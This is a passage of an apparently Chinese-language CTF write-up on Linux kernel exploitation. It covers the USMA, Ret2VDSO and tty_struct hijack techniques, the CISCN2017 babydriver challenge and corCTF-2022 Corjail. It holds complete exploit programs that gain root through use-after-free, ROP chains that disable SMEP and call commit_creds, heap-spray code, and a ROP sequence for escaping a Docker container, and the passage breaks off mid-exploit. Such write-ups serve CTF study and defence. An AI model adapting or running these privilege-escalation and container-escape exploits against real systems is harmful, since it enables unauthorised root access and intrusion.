sa.sll_pkttype = 0 ; sa.sll_halen = 0 ; int rv = bind(s, (struct sockaddr *)&sa, sizeof (sa)); if (rv < 0 ) { puts ("bind(AF_PACKET)" ); exit (-1 ); } return s; } int alloc_pgv (int count, int size) { return packet_socket_setup(size, 2048 , count, 0 , 100 ); } void unshare_setup (void ) { char edit[0x100 ]; int tmp_fd; unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET); tmp_fd = open("/proc/self/setgroups" , O_WRONLY); write(tmp_fd, "deny" , strlen ("deny" )); printf ("[*] setgroups deny\n" ); close(tmp_fd); tmp_fd = open("/proc/self/uid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getuid()); write(tmp_fd, edit, strlen (edit)); printf ("[*] uid_map %s\n" , edit); close(tmp_fd); tmp_fd = open("/proc/self/gid_map" , O_WRONLY); snprintf (edit, sizeof (edit), "0 %d 1" , getgid()); write(tmp_fd, edit, strlen (edit)); printf ("[*] gid_map %s\n" , edit); close(tmp_fd); } void USMA () { int pipe_fd[2 ]; save_status(); pipe(pipe_fd); pid_t pid = fork(); if (pid == 0 ) { unshare_setup(); int bof_fd = open("/dev/bof" , O_RDWR); if (bof_fd < 0 ) { puts ("[-] Failed to open bof." ); exit (-1 ); } struct param p = {0x200 , malloc (0x200 ), 0 }; memset (p.buf, 0 , 0x200 ); alloc_buf(bof_fd, &p); write_buf(bof_fd, &p); free_buf(bof_fd, &p); int packet_fd; packet_fd = alloc_pgv(0x200 /8 , 0x1000 ); read_buf(bof_fd, &p); qword_dump("leak 1" , p.buf, 0x200 ); for (size_t i = 0 ; i < 0x200 /8 ; i++) { p.buf[i] = SyS_setresuid_page_base; } write_buf(bof_fd, &p); read_buf(bof_fd, &p); qword_dump("leak 2" , p.buf, 0x200 ); char *page = mmap(NULL , 0x1000 * (0x200 / 8 ), PROT_READ | PROT_WRITE, MAP_SHARED, packet_fd, 0 ); if (page == MAP_FAILED) { perror("mmap" ); exit (-1 ); } qword_dump("page" , (page+SyS_setresuid_page_offset), (0x8 )); page[SyS_setresuid_page_offset + 0 ] = 0x26 ; page[SyS_setresuid_page_offset + 1 ] = 0x00 ; page[SyS_setresuid_page_offset + 2 ] = 0x00 ; page[SyS_setresuid_page_offset + 3 ] = 0x14 ; qword_dump("page" , (page+SyS_setresuid_page_offset), (0x8 )); write(pipe_fd[1 ], "E" , 1 ); pause(); } else if (pid > 0 ) { char buf[1 ]; read(pipe_fd[0 ], buf, 1 ); printf ("[*] start get root\n" ); if (setresuid(0 , 0 , 0 ) < 0 ) { perror("setresuid" ); exit (-1 ); } printf (GREEN "[+] Get root successfully!" NONE "\n" ); system("/bin/sh" ); } else { puts ("[-] fork() error" ); exit (-1 ); } return ; } int main () { USMA(); return 0 ; }
KSMA 利用思路 exp Ret2hbp 利用思路 exp Use After Cleanup 利用思路 exp Ret2VDSO 利用思路 VDSO是内核映射到用户空间的代码,利用内核的set_memory_rw设置vdso为可写权限,然后向vdso写入shellcode即可。可以用来绕过PAN/PXN保护。
exp Kernel Unlink 利用思路 exp CISCN2017 babydriver 题目分析 开了 smep 保护,没有 kaslr。
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet nokaslr' \ -enable-kvm \ -monitor /dev/null \ -m 64M \ --nographic \ -smp cores=1,threads=1 \ -cpu kvm64,+smep \ -s
模块中存在一个babydevice_t结构体:
1 2 3 4 struct babydevice_t { char *device_buf; size_t device_buf_len; }
babyioctl
将原先的 device_buf 释放,并分配一块新的内存。但这里有个很重要的点需要注意:该位置的 kmalloc 大小可以被用户任意指定。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 __int64 __fastcall babyioctl (file *filp, unsigned int command, unsigned __int64 arg) { size_t v3; size_t v4; _fentry__(filp, command); v4 = v3; if ( command == 0x10001 ) { kfree(babydev_struct.device_buf); babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0 LL); babydev_struct.device_buf_len = v4; printk("alloc done\n" ); return 0LL ; } else { printk("\x013defalut:arg is %ld\n" ); return -22LL ; } }
babyopen
申请的初始buf长度为0x40。
1 2 3 4 5 6 7 8 int __fastcall babyopen (inode *inode, file *filp) { _fentry__(inode, filp); babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6 ], 0x24000C0 LL, 64LL ); babydev_struct.device_buf_len = 64LL ; printk("device open\n" ); return 0 ; }
babywrite
ida 反汇编存在错误,这里需要修改一下copy_from_user的call type为void (__fastcall *)(char *, char *, size_t)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ssize_t __fastcall babywrite (file *filp, const char *buffer, size_t length, loff_t *offset) { size_t v4; ssize_t result; ssize_t v6; _fentry__(filp, buffer); if ( !babydev_struct.device_buf ) return -1LL ; result = -2LL ; if ( babydev_struct.device_buf_len > v4 ) { v6 = v4; ((void (__fastcall *)(char *, char *, size_t ))copy_from_user)(babydev_struct.device_buf, (char *)buffer, v4); return v6; } return result; }
babyread
修改一下copy_to_user的函数调用类型为void (__fastcall *)(char *, char *, size_t)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ssize_t __fastcall babyread (file *filp, char *buffer, size_t length, loff_t *offset) { size_t v4; ssize_t result; ssize_t v6; _fentry__(filp, buffer); if ( !babydev_struct.device_buf ) return -1LL ; result = -2LL ; if ( babydev_struct.device_buf_len > v4 ) { v6 = v4; ((void (__fastcall *)(char *, char *, size_t ))copy_to_user)(buffer, babydev_struct.device_buf, v4); return v6; } return result; }
babyrelease
没有重置len,也没有清空buf。
1 2 3 4 5 6 7 int __fastcall babyrelease (inode *inode, file *filp) { _fentry__(inode, filp); kfree(babydev_struct.device_buf); printk("device release\n" ); return 0 ; }
利用思路 执行完 babyrelease 函数之后,device_buf就会成为悬垂指针。但需要注意的是,在用户进程空间中,当执行close(fd)之后,该进程将无法再使用这个文件描述符,因此没有办法在close后再利用这个 fd 去进行写操作。
但我们可以利用 babydriver 中的变量全是全局变量的这个特性,同时执行两次 open 操作,获取两个 fd。这样即便一个 fd 被 close 了,我们仍然可以利用另一个 fd 来对 device_buf 进行写操作。
这道题虽然可以利用UAF提权,但这里我们主要练习一下tty_struct劫持,这道题的劫持相对来说是很简单的。
利用 UAF 劫持 tty_struct 的 ops 执行伪造的 fake_ops。
利用 fake_ops->ioctl 结合 cr4 寄存器关闭 smep,并完成栈迁移。
执行用户空间的提权代码。
这里需要注意的是:
mmap 的内存不应该从 rax & 0xffffffff 开始,因为在执行 rop 时返回到用户空间执行 get_root 函数会抬高 rsp 小于 rax & 0xffffffff 造成越界,因此需要加一个偏移。
1 2 3 4 5 6 7 char * fake_stack = mmap( (hijacked_stack_addr & (~0xffff ))-0x1000 , 0x30000 , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1 , 0 );
mmap 的内存是没有映射到实际物理内存的虚拟内存,如果 rsp 到达没有写入 rop 的位置同样也会导致越界错误,因此在使用前先写入数据使其映射到物理内存上。
1 memset (fake_stack, 0 , 0x30000 );
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 #include <assert.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <unistd.h> #define xchg_eax_esp_addr 0xffffffff8100008a #define prepare_kernel_cred_addr 0xffffffff810a1810 #define commit_creds_addr 0xffffffff810a1420 #define pop_rdi_addr 0xffffffff810d238d #define mov_cr4_rdi_pop_rbp_addr 0xffffffff81004d80 #define swapgs_pop_rbp_addr 0xffffffff81063694 #define iretq_addr 0xffffffff814e35ef void get_root () { void * (*prepare_kernel_cred)(void *) = prepare_kernel_cred_addr; void (*commit_creds)(void *) = commit_creds_addr; commit_creds(prepare_kernel_cred(NULL )); } void get_shell () { system("/bin/sh" ); } unsigned long user_cs, user_rflags, user_rsp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_rsp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*]status has been saved." ); } int main () { save_status(); int fd1 = open("/dev/babydev" , O_RDWR); int fd2 = open("/dev/babydev" , O_RDWR); ioctl(fd1, 65537 , 0x2e0 ); close(fd1); int master_fd = open("/dev/ptmx" , O_RDWR); size_t fake_tty_ops[] = { 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , xchg_eax_esp_addr }; size_t hijacked_stack_addr = ((size_t )xchg_eax_esp_addr & 0xffffffff ); char * fake_stack = mmap( (hijacked_stack_addr & (~0xffff ))-0x1000 , 0x30000 , PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1 , 0 ); memset (fake_stack, 0 , 0x30000 ); size_t rop_chain_mem[] = { pop_rdi_addr, 0x6f0 , mov_cr4_rdi_pop_rbp_addr, 0 , get_root, swapgs_pop_rbp_addr, 0 , iretq_addr, get_shell, user_cs, user_rflags, user_rsp, user_ss }; memcpy (hijacked_stack_addr, rop_chain_mem, sizeof (rop_chain_mem)); int ops_ptr_offset = 4 + 4 + 8 + 8 ; char overwrite_mem[ops_ptr_offset + 8 ]; char ** ops_ptr_addr = overwrite_mem + ops_ptr_offset; read(fd2, overwrite_mem, sizeof (overwrite_mem)); *ops_ptr_addr = &fake_tty_ops; write(fd2, overwrite_mem, sizeof (overwrite_mem)); ioctl(ptmx_fd, 0 , 0 ); return 0 ; }
corCTF-2022 Corjail 题目分析 我们可以使用 Guestfish 工具读取和修改 qcow2 文件。
run_challenge.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/sh qemu-system-x86_64 \ -m 1G \ -nographic \ -no-reboot \ -kernel bzImage \ -append "console=ttyS0 root=/dev/sda quiet loglevel=3 rd.systemd.show_status=auto rd.udev.log_level=3 oops=panic panic=-1 net.ifnames=0 pti=on" \ -hda coros.qcow2 \ -snapshot \ -monitor /dev/null \ -cpu qemu64,+smep,+smap,+rdrand \ -smp cores=4 \ --enable-kvm
init脚本
查看服务进程/etc/systemd/system/init.service;
1 2 3 4 5 6 7 8 Description=Initialize challenge [Service] Type=oneshot ExecStart=/usr/local/bin/init [Install] WantedBy=multi-user.target
查看 /usr/local/bin/init 脚本;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 cat /usr/local/bin/init USER=user FLAG=$(head -n 100 /dev/urandom | sha512sum | awk '{printf $1}' ) useradd --create-home --shell /bin/bash $USER echo "export PS1='\[\033[01;31m\]\u@CoROS\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]# '" >> /root/.bashrcecho "export PS1='\[\033[01;35m\]\u@CoROS\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '" >> /home/$USER /.bashrcchmod -r 0700 /home/$USER mv /root/temp /root/$FLAG chmod 0400 /root/$FLAG
password
1 2 3 4 5 6 7 8 9 10 11 ❯ guestfish --rw -a coros.qcow2 ><fs> run ><fs> list-filesystems /dev/sda: ext4 ><fs> mount /dev/sda / ><fs> cat /etc/password libguestfs: error: download: /etc/password: No such file or directory ><fs> cat /etc/passwd root:x:0:0:root:/root:/usr/local/bin/jail daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ......
root_shell
查看root用户的/usr/local/bin/jail;
1 2 3 4 5 6 7 8 9 10 11 12 13 ><fs> cat /usr/local/bin/jail echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...' /usr/bin/docker run -it --user user \ --hostname CoRJail \ --security-opt seccomp=/etc/docker/corjail.json \ -v /proc/cormon:/proc_rw/cormon:rw corcontainer /bin/bash /usr/sbin/poweroff -f
发现其启动root的 shell 后是首先调用 docker来构建了一个容器然后关闭自身,在那之后我们起的虚拟环境就是处于该docker容器当中。
为了方便调试,我们可以使用edit将其修改为:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ><fs> edit /usr/local/bin/jail ><fs> cat /usr/local/bin/jail echo -e '[\033[5m\e[1;33m!\e[0m] Spawning a shell in a CoRJail...' cp /exploit /home/user || echo "[!] exploit not found, skipping" chown -R user:user /home/userecho 0 > /proc/sys/kernel/kptr_restrict/usr/bin/docker run -it --user root \ --hostname CoRJail \ --security-opt seccomp=/etc/docker/corjail.json \ --cap-add CAP_SYSLOG \ -v /proc/cormon:/proc_rw/cormon:rw \ -v /home/user/:/home/user/host \ corcontainer /bin/bash /usr/sbin/poweroff -f
edit 的用法和 vim 一样。
后面我们上传 exp 的时候可以使用 upload 命令,其格式如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 ><fs> help upload NAME upload - upload a file from the local machine SYNOPSIS upload filename remotefilename DESCRIPTION Upload local file filename to remotefilename on the filesystem. filename can also be a named pipe. See also "download" .
kernel_patch
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 diff -ruN a/arch/x86/entry/syscall_64.c b/arch/x86/entry/syscall_64.c @@ -17,6 +17,9 @@ #define __SYSCALL_64(nr, sym) [nr] = __x64_##sym, +DEFINE_PER_CPU(u64 [NR_syscalls], __per_cpu_syscall_count); +EXPORT_PER_CPU_SYMBOL(__per_cpu_syscall_count); + asmlinkage const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = { /* * Smells like a compiler bug -- it doesn't work diff -ruN a/arch/x86/include/asm/syscall_wrapper.h b/arch/x86/include/asm/syscall_wrapper.h @@ -245,7 +245,7 @@ * SYSCALL_DEFINEx() -- which is essential for the COND_SYSCALL() and SYS_NI() * macros to work correctly. */ -#define SYSCALL_DEFINE0(sname) \ +#define __SYSCALL_DEFINE0(sname) \ SYSCALL_METADATA(_##sname, 0); \ static long __do_sys_##sname(const struct pt_regs *__unused); \ __X64_SYS_STUB0(sname) \ diff -ruN a/include/linux/syscalls.h b/include/linux/syscalls.h @@ -82,6 +82,7 @@ #include <linux/key.h> #include <linux/personality.h> #include <trace/syscall.h> +#include <asm/syscall.h> #ifdef CONFIG_ARCH_HAS_SYSCALL_WRAPPER /* @@ -202,8 +203,8 @@ } #endif -#ifndef SYSCALL_DEFINE0 -#define SYSCALL_DEFINE0(sname) \ +#ifndef __SYSCALL_DEFINE0 +#define __SYSCALL_DEFINE0(sname) \ SYSCALL_METADATA(_##sname, 0); \ asmlinkage long sys_##sname(void); \ ALLOW_ERROR_INJECTION(sys_##sname, ERRNO); \ @@ -219,9 +220,41 @@ #define SYSCALL_DEFINE_MAXARGS 6 -#define SYSCALL_DEFINEx(x, sname, ...) \ - SYSCALL_METADATA(sname, x, __VA_ARGS__) \ - __SYSCALL_DEFINEx(x, sname, __VA_ARGS__) +DECLARE_PER_CPU(u64[], __per_cpu_syscall_count); + +#define SYSCALL_COUNT_DECLAREx(sname, x, ...) \ + static inline long __count_sys##sname(__MAP(x, __SC_DECL, __VA_ARGS__)); + +#define __SYSCALL_COUNT(syscall_nr) \ + this_cpu_inc(__per_cpu_syscall_count[(syscall_nr)]) + +#define SYSCALL_COUNT_FUNCx(sname, x, ...) \ + { \ + __SYSCALL_COUNT(__syscall_meta_##sname.syscall_nr); \ + return __count_sys##sname(__MAP(x, __SC_CAST, __VA_ARGS__)); \ + } \ + static inline long __count_sys##sname(__MAP(x, __SC_DECL, __VA_ARGS__)) + +#define SYSCALL_COUNT_DECLARE0(sname) \ + static inline long __count_sys_##sname(void); + +#define SYSCALL_COUNT_FUNC0(sname) \ + { \ + __SYSCALL_COUNT(__syscall_meta__##sname.syscall_nr); \ + return __count_sys_##sname(); \ + } \ + static inline long __count_sys_##sname(void) + +#define SYSCALL_DEFINEx(x, sname, ...) \ + SYSCALL_METADATA(sname, x, __VA_ARGS__) \ + SYSCALL_COUNT_DECLAREx(sname, x, __VA_ARGS__) \ + __SYSCALL_DEFINEx(x, sname, __VA_ARGS__) \ + SYSCALL_COUNT_FUNCx(sname, x, __VA_ARGS__) + +#define SYSCALL_DEFINE0(sname) \ + SYSCALL_COUNT_DECLARE0(sname) \ + __SYSCALL_DEFINE0(sname) \ + SYSCALL_COUNT_FUNC0(sname) #define __PROTECT(...) asmlinkage_protect(__VA_ARGS__) diff -ruN a/kernel/trace/trace_syscalls.c b/kernel/trace/trace_syscalls.c @@ -101,7 +101,7 @@ return NULL; } -static struct syscall_metadata *syscall_nr_to_meta(int nr) +struct syscall_metadata *syscall_nr_to_meta(int nr) { if (IS_ENABLED(CONFIG_HAVE_SPARSE_SYSCALL_NR)) return xa_load(&syscalls_metadata_sparse, (unsigned long)nr); @@ -111,6 +111,7 @@ return syscalls_metadata[nr]; } +EXPORT_SYMBOL(syscall_nr_to_meta); const char *get_syscall_name(int syscall) { @@ -122,6 +123,7 @@ return entry->name; } +EXPORT_SYMBOL(get_syscall_name); static enum print_line_t print_syscall_enter(struct trace_iterator *iter, int flags,
其中
1 +DEFINE_PER_CPU(u64 [NR_syscalls], __per_cpu_syscall_count);
为每个CPU都创建一个 __per_cpu_syscall_count 变量用来记录系统调用的次数。
seccomp.json 保存了系统调用的白名单。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 { "defaultAction" : "SCMP_ACT_ERRNO" , "defaultErrnoRet" : 1 , "syscalls" : [ { "names" : [ "_llseek" , "_newselect" , "accept" , "accept4" , "access" , ... ] , "action" : "SCMP_ACT_ALLOW" } , { "names" : [ "clone" ] , "action" : "SCMP_ACT_ALLOW" , "args" : [ { "index" : 0 , "value" : 2114060288 , "op" : "SCMP_CMP_MASKED_EQ" } ] } ] }
根据README.md提示,可以在proc_rw/cormon看到使用到的系统调用在各个CPU当中的情况。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@CoRJail:/ CPU0 CPU1 CPU2 CPU3 Syscall (NR) 9 16 25 18 sys_poll (7) 0 0 0 0 sys_fork (57) 66 64 79 60 sys_execve (59) 0 0 0 0 sys_msgget (68) 0 0 0 0 sys_msgsnd (69) 0 0 0 0 sys_msgrcv (70) 0 0 0 0 sys_ptrace (101) 15 19 11 6 sys_setxattr (188) 27 24 11 20 sys_keyctl (250) 0 0 2 2 sys_unshare (272) 0 1 0 0 sys_execveat (322)
也可以指定系统调用。
1 2 3 4 5 6 7 root@CoRJail:/ root@CoRJail:/ CPU0 CPU1 CPU2 CPU3 Syscall (NR) 0 0 0 0 sys_msgsnd (69) 0 0 0 0 sys_msgrcv (70)
src.c
可以看到 write 存在明显的off-by-null。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 static ssize_t cormon_proc_write (struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) { loff_t offset = *ppos; char *syscalls; size_t len; if (offset < 0 ) return -EINVAL; if (offset >= PAGE_SIZE || !count) return 0 ; len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count; syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC); printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n" , (uint64_t )syscalls); if (!syscalls) { printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n" ); return -ENOMEM; } if (copy_from_user(syscalls, ubuf, len)) { printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n" ); return -EFAULT; } syscalls[len] = '\x00' ; if (update_filter(syscalls)) { kfree(syscalls); return -EINVAL; } kfree(syscalls); return count; }
利用思路 在 poll_list 利用方式中:
先通过 add_key() 堆喷大量 32 字节大小的 user_key_payload。
这里只所以是 32 字节大小是因为要与后面的 seq_operations 配合,并且 32 大小的 object 其低字节是可能为 \x00 的,其低字节为 0x20、0x40、0x80 、0xa0、0xc0、0xe0、0x00。
然后创建 poll_list 链,其中 poll_list.next 指向的是一个 0x20 大小的 object。
触发 off by null,修改 poll_list.next 的低字节为 \x00,这里可能导致其指向某个 user_key_payload。
然后等待 timeout 后, 就会导致某个 user_key_payload 被释放,导致 UAF。
详细流程如下:
首先,我们要打开有漏洞的模块。 使用bind_core()将当前进程绑定到CPU0,因为我们是在一个多核环境中工作,而slab是按CPU分配的。
1 2 3 4 5 6 7 8 9 10 void bind_core (bool fixed, bool thread) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(fixed ? 0 : randint(1 , get_nprocs()), &cpu_set); if (thread) { pthread_setaffinity_np(pthread_self(), sizeof (cpu_set), &cpu_set); } else { sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); } }
喷射大量 0x20 大小的 user_key_payload 和下图所示 0x1000 + 0x20 的 poll_list 。
此时内存中 object 的分布如下图所示,其中黄色的是 user_key_payload ,绿色的是 poll_list ,白色是空闲 object 。
通过 off by null 修改 0x1000 大小的 poll_list ,使得指向 0x20 大小 poll_list 的 next 指针指向 user_key_payload 。之后释放所有的 poll_list 结构,被 next 指向的的 user_key_payload 也被释放,形成 UAF 。
注意,为了确保释放 poll_list 不出错,要保证 0x20 大小的 poll_list 的 next 指针为 NULL 。也就是 user_key_payload 的前 8 字节为 NULL 。由于 user_key_payload 的前 8 字节没有初始化,因此可以在申请 user_key_payload 前先用 setxattr 把前 8 字节置为 NULL 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 static long setxattr (struct dentry *d, const char __user *name, const void __user *value, size_t size, int flags) { int error; void *kvalue = NULL ; char kname[XATTR_NAME_MAX + 1 ]; [...] if (size) { [...] kvalue = kvmalloc(size, GFP_KERNEL); if (!kvalue) return -ENOMEM; if (copy_from_user(kvalue, value, size)) { error = -EFAULT; goto out; } [...] } error = vfs_setxattr(d, kname, kvalue, size, flags); out: kvfree(kvalue); return error; }
另外实测 kmalloc-32 的 freelist 偏移为 16 字节,不会覆盖 next 指针。
喷射 seq_operations 利用 seq_operations->next 的低二字节覆盖 user_key_payload->datalen 实现 user_key_payload 越界读, user_key_payload->data 前 8 字节被覆盖为 seq_operations->show ,可以泄露内核基址。另外可以根据是否越界读判断该 user_key_payload 是否被 seq_operations 覆盖。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 struct seq_operations { void * (*start) (struct seq_file *m, loff_t *pos); void (*stop) (struct seq_file *m, void *v); void * (*next) (struct seq_file *m, void *v, loff_t *pos); int (*show) (struct seq_file *m, void *v); }; struct user_key_payload { struct rcu_head rcu ; unsigned short datalen; char data[0 ] __aligned(__alignof__(u64)); }; struct callback_head { struct callback_head *next ; void (*func)(struct callback_head *head); } __attribute__((aligned(sizeof (void *)))); #define rcu_head callback_head
之后释放不能越界读的 user_key_payload 并喷射 tty_file_private 填充产生的空闲 object 。之后再次越界读泄露 tty_file_private->tty 指向的 tty_struct ,我们定义这个地址为 target_object 。
释放 seq_operations ,喷射 0x20 大小的 poll_list 。现在UAF的堆块被user_key_payload和poll_list占领。在 poll_list 被释放前,释放劫持的 user_key_payload ,利用 setxattr 修改 poll_list 的 next 指针指向 target_object - 0x18,方便后续伪造pipe_buffer 。为了实现 setxattr 的喷射效果,setxattr 修改过的 object 通过申请 user_key_payload 劫持,确保下次 setxattr 修改的是另外的 object 。
打开 /dev/ptmx 时会分配 tty_file_private 并且该结构体的 tty 指针会指向 tty_struct 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 int tty_alloc_file (struct file *file) { struct tty_file_private *priv ; priv = kmalloc(sizeof (*priv), GFP_KERNEL); if (!priv) return -ENOMEM; file->private_data = priv; return 0 ; } struct tty_file_private { struct tty_struct *tty ; struct file *file ; struct list_head list ; };
趁 poll_list 还没有释放,释放 tty_struct 并申请 pipe_buffer ,将 target_object(tty_struct) 替换为 pipe_buffer 。
1 2 3 4 5 6 7 struct pipe_buffer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private; };
之后 poll_list 释放导致 target_object - 0x18 区域释放。我们可以申请一个 0x400 大小的 user_key_payload 劫持 target_object - 0x18 ,从而劫持 pipe_buffer->ops 实现控制流劫持。
docker逃逸
具体实现为修改 task_struct 的 fs 指向 init_fs 。用 find_task_by_vpid() 来定位Docker容器任务,我们用switch_task_namespaces()。但这还不足以从容器中逃逸。在Docker容器中,setns() 被 seccomp默认屏蔽了,我们可以克隆 init_fs 结构,然后用find_task_by_vpid()定位当前任务,用 gadget 手动安装新fs_struct。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 *rop++ = pop_rdi_ret; *rop++ = init_cred; *rop++ = commit_creds; *rop++ = pop_rdi_ret; *rop++ = getpid(); *rop++ = find_task_by_vpid; *rop++ = pop_rcx_ret; *rop++ = 0x6e0 ; *rop++ = add_rax_rcx_ret; *rop++ = pop_rbx_ret; *rop++ = init_fs; *rop++ = mov_mmrax_rbx_pop_rbx_ret; rop++;
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/sysinfo.h> #define PAGE_SIZE 0x1000 int randint (int min, int max) { return min + (rand() % (max - min)); } void bind_core (bool fixed, bool thread) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(fixed ? 0 : randint(1 , get_nprocs()), &cpu_set); if (thread) { pthread_setaffinity_np(pthread_self(), sizeof (cpu_set), &cpu_set); } else { sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); } } void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } bool is_kernel_text_addr (size_t addr) { return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF ; } bool is_dir_mapping_addr (size_t addr) { return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF ; } #define INVALID_KERNEL_OFFSET 0x1145141919810 const size_t kernel_addr_list[] = { 0xffffffff813275c0 , 0xffffffff812d4320 , 0xffffffff812d4340 , 0xffffffff812d4330 }; 